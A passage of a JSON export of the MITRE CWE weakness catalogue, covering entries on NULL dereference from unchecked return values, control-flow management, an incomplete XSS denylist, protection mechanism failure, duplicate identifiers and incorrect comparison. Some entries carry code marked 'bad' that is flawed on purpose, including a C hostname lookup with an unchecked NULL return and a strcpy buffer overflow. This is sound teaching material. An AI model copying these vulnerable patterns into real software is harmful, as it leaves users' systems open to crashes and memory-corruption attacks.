rarely-triggered error conditions, reducing the chances of detection during black box testing."},{"Method":"White Box","Description":"Code analysis can require knowledge of API behaviors for library functions that might return NULL, reducing the chances of detection when unknown libraries are used."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The code below makes a call to the getUserName() function but doesn\'t check the return value before dereferencing (which may cause a NullPointerException).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String username = getUserName();if (username.equals(ADMIN_USER)) {}","xhtml:br":"","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1052","Description":"Large Content-Length value leads to NULL pointer dereference when malloc fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1052"},{"Reference":"CVE-2006-6227","Description":"Large message length field leads to NULL pointer dereference when malloc fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6227"},{"Reference":"CVE-2006-2555","Description":"Parsing routine encounters NULL dereference when input is missing a colon separator.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2555"},{"Reference":"CVE-2003-1054","Description":"URI parsing API sets argument to NULL when a parsing failure occurs, such as when the Referer header is missing a hostname, leading to NULL dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1054"},{"Reference":"CVE-2008-5183","Description":"chain: unchecked return value can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP34-C","Entry_Name":"Do not dereference null pointers","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP32-PL","Entry_Name":"Do not ignore function return values","Mapping_Fit":"CWE More Specific"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Relevant_Properties, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"}]}},"691":{"attr":{"@_ID":"691","@_Name":"Insufficient Control Flow Management","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not sufficiently manage its control flow during execution, creating conditions in which the control flow can be modified in unexpected ways.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":40,"Entry_Name":"Insufficient Process Validation"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"29"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"692":{"attr":{"@_ID":"692","@_Name":"Incomplete Denylist to Cross-Site Scripting","@_Abstraction":"Compound","@_Structure":"Chain","@_Status":"Draft"},"Description":"The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed.","Extended_Description":"While XSS might seem simple to prevent, web browsers vary so widely in how they parse web pages, that a denylist cannot keep track of all the variations. The \\"XSS Cheat Sheet\\" [REF-714] contains a large number of attacks that are intended to bypass incomplete denylists.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"StartsWith","@_CWE_ID":"184","@_View_ID":"709","@_Chain_ID":"692"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5727","Description":"Denylist only removes &lt;SCRIPT&gt; tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727"},{"Reference":"CVE-2006-3617","Description":"Denylist only removes &lt;SCRIPT&gt; tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3617"},{"Reference":"CVE-2006-4308","Description":"Denylist only checks \\"javascript:\\" tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-714"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"added Language_Class \\"All\\""},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Name, Observed_Examples, References"}],"Previous_Entry_Name":{"#text":"Incomplete Blacklist to Cross-Site Scripting","attr":{"@_Date":"2020-02-26"}}}},"693":{"attr":{"@_ID":"693","@_Name":"Protection Mechanism Failure","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.","Extended_Description":"This weakness covers three distinct situations. A \\"missing\\" protection mechanism occurs when the application does not define any mechanism against a certain class of attack. An \\"insufficient\\" protection mechanism might provide some defenses - for example, against the most common attacks - but it does not protect against everything that is intended. Finally, an \\"ignored\\" mechanism occurs when a mechanism is available and in active use within the product, but the developer has not applied it in some code path.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"107"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"20"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"237"}},{"attr":{"@_CAPEC_ID":"36"}},{"attr":{"@_CAPEC_ID":"477"}},{"attr":{"@_CAPEC_ID":"480"}},{"attr":{"@_CAPEC_ID":"51"}},{"attr":{"@_CAPEC_ID":"57"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"65"}},{"attr":{"@_CAPEC_ID":"668"}},{"attr":{"@_CAPEC_ID":"74"}},{"attr":{"@_CAPEC_ID":"87"}}]},"Notes":{"Note":{"#text":"The concept of protection mechanisms is well established, but protection mechanism failures have not been studied comprehensively. It is suspected that protection mechanisms can have significantly different types of weaknesses than the weaknesses that they are intended to prevent.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"694":{"attr":{"@_ID":"694","@_Name":"Use of Multiple Resources with Duplicate Identifier","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses multiple resources that can have the same identifier, in a context in which unique identifiers are required.","Extended_Description":"If the software assumes that each resource has a unique identifier, the software could operate on the wrong resource if attackers can cause multiple resources to be associated with the same identifier.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"99","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If unique identifiers are assumed when protecting sensitive resources, then duplicate identifiers might allow attackers to bypass the protection."},{"Scope":"Other","Impact":"Quality Degradation"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Where possible, use unique identifiers. If non-unique identifiers are detected, then do not operate any resource with a non-unique identifier and report the error appropriately."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2013-4787","Description":"chain: mobile OS verifies cryptographic signature of file in an archive, but then installs a different file with the same name that is also listed in the archive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4787"}},"Notes":{"Note":{"#text":"This weakness is probably closely associated with other issues related to doubling, such as CWE-675 (Duplicate Operations on Resource). It\'s often a case of an API contract violation (CWE-227).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"695":{"attr":{"@_ID":"695","@_Name":"Use of Low-Level Functionality","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses low-level functionality that is explicitly prohibited by the framework or specification under which the software is supposed to operate.","Extended_Description":"The use of low-level functionality can violate the specification in unexpected ways that effectively disable built-in protection mechanisms, introduce exploitable inconsistencies, or otherwise expose the functionality to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"36"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"696":{"attr":{"@_ID":"696","@_Name":"Incorrect Behavior Order","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product performs multiple related behaviors, but the behaviors are performed in the wrong order in ways which may produce resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-9805","Description":"Chain: Creation of the packet client occurs before initialization is complete (CWE-696) resulting in a read from uninitialized memory (CWE-908), causing memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9805"},{"Reference":"CVE-2007-5191","Description":"file-system management programs call the setuid and setgid functions in the wrong order and do not check the return values, allowing attackers to gain unintended privileges","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5191"},{"Reference":"CVE-2007-1588","Description":"C++ web server program calls Process::setuid before calling Process::setgid, preventing it from dropping privileges, potentially allowing CGI programs to be called with higher privileges than intended","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1588"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS36-C","Entry_Name":"Observe correct revocation order while relinquishing privileges","Mapping_Fit":"CWE More Abstract"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"463"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"697":{"attr":{"@_ID":"697","@_Name":"Incorrect Comparison","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software compares two entities in a security-relevant context, but the comparison is incorrect, which may lead to resultant weaknesses.","Extended_Description":{"xhtml:p":"This weakness class covers several possibilities:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["the comparison checks one factor incorrectly;","the comparison should consider multiple factors, but it does not check some of those factors at all;","the comparison checks the wrong factor."]}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-115"},"Intro_Text":"Consider an application in which Truck objects are defined to be the same if they have the same make, the same model, and were manufactured in the same year.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Truck {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String make;private String model;private int year;public boolean equals(Object o) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (o == null) return false;if (o == this) return true;if (!(o instanceof Truck)) return false;Truck t = (Truck) o;return (this.make.equals(t.getMake()) &amp;&amp; 